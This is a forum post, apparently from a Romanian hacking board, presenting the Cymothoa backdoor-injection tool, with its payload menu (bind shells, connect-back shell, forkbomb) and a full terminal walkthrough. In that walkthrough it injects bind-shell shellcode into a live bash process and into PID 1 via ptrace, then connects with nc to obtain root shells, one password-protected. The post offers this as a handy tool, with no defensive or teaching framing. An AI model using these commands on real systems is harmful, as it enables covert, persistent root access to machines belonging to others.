Jump to content
co4ie

Cymothoa Backdoor Inject

By co4ie, in Programe utile

Recommended Posts

co4ie Newbie

co4ie

Posted
Posted

Inject Backdoor’s Shellcode Into An Existing Process

Cymothoa is a stealth backdooring tool, that injects backdoor’s shellcode into an existing process. The tool uses the ptrace library (available on nearly all * nix), to manipulate processes and infect them.

root@Dis9Team:/pentest/backdoors/cymothoa# ./cymothoa -S

0 - bind /bin/sh to the provided port (requires -y)
1 - bind /bin/sh + fork() to the provided port (requires -y) - izik <izik@tty64.org>
2 - bind /bin/sh to tcp port with password authentication (requires -y -o)
3 - /bin/sh connect back (requires -x, -y)
4 - tcp socket proxy (requires -x -y -r) - Russell Sanford (xort@tty64.org)
5 - script execution (requires -i -c), creates a tmp file in the process dir you must remove
6 - forks an HTTP Server on port tcp/8800 - http://xenomuta.tuxfamily.org/
7 - serial port busybox binding - phar@stonedcoder.org mdavis@ioactive.com
8 - forkbomb (just for fun...) - Kris Katterjohn
9 - open cd-rom loop (follows /dev/cdrom symlink) - izik@tty64.org
10 - audio (knock knock knock) via /dev/dsp - Cody Tubbs (pigspigs@yahoo.com)
root@Dis9Team:/pentest/backdoors/cymothoa#

find /bin/bash pid

root@Dis9Team:/pentest/backdoors/cymothoa# ps aux | grep /bin/bash
root      1236  0.0  0.2   4280  1376 tty1     S+   09:22   0:00 /bin/bash /usr/bin/startx
root      1506  0.1  0.3   4648  1932 pts/1    S    09:22   0:00 /bin/bash
root      1554  0.0  0.1   3376   744 pts/1    S+   09:26   0:00 grep --color=auto /bin/bash

pid = 1506

root@Dis9Team:/pentest/backdoors/cymothoa# ./cymothoa  -p 1506 -s 0 -y 10086
[+] attaching to process 1506

 register info:
 -----------------------------------------------------------
 eax value: 0xfffffe00   ebx value: 0xffffffff
 esp value: 0xbf940ae4   eip value: 0xb7818422
 ------------------------------------------------------------

[+] new esp: 0xbf940ae0
[+] injecting code into 0xb7819000
[+] copy general purpose registers
[+] detaching from 1506

[+] infected!!!
root@Dis9Team:/pentest/backdoors/cymothoa#

-s = 0 Payloads = 0 – bind /bin/sh to the provided port (requires -y)

root@Dis9Team:/pentest/backdoors/cymothoa# nmap -p 10086 127.0.0.1

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-23 09:29 CST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00062s latency).
PORT      STATE SERVICE
10086/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds

root@Dis9Team:/pentest/backdoors/cymothoa# nc 127.0.0.1 10086
id
uid=0(root) gid=0(root) groups=0(root)
pwd
/pentest/backdoors/cymothoa

next Payloads = 2 – bind /bin/sh to tcp port with password authentication (requires -y -o)

root@Dis9Team:/pentest/backdoors/cymothoa# ./cymothoa -p 1 -s 2 -y 1002 -o 123456
[+] attaching to process 1

 register info:
 -----------------------------------------------------------
 eax value: 0xfffffdfe   ebx value: 0xa
 esp value: 0xbfc0240c   eip value: 0xb7856422
 ------------------------------------------------------------

[+] new esp: 0xbfc02408
[+] injecting code into 0xb7857000
[+] copy general purpose registers
[+] detaching from 1

[+] infected!!!
root@Dis9Team:/pentest/backdoors/cymothoa# nc 127.0.0.1 1002
Password: 123456

Un Tool foarte util ... simplu si la obiect !!

Sursa

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...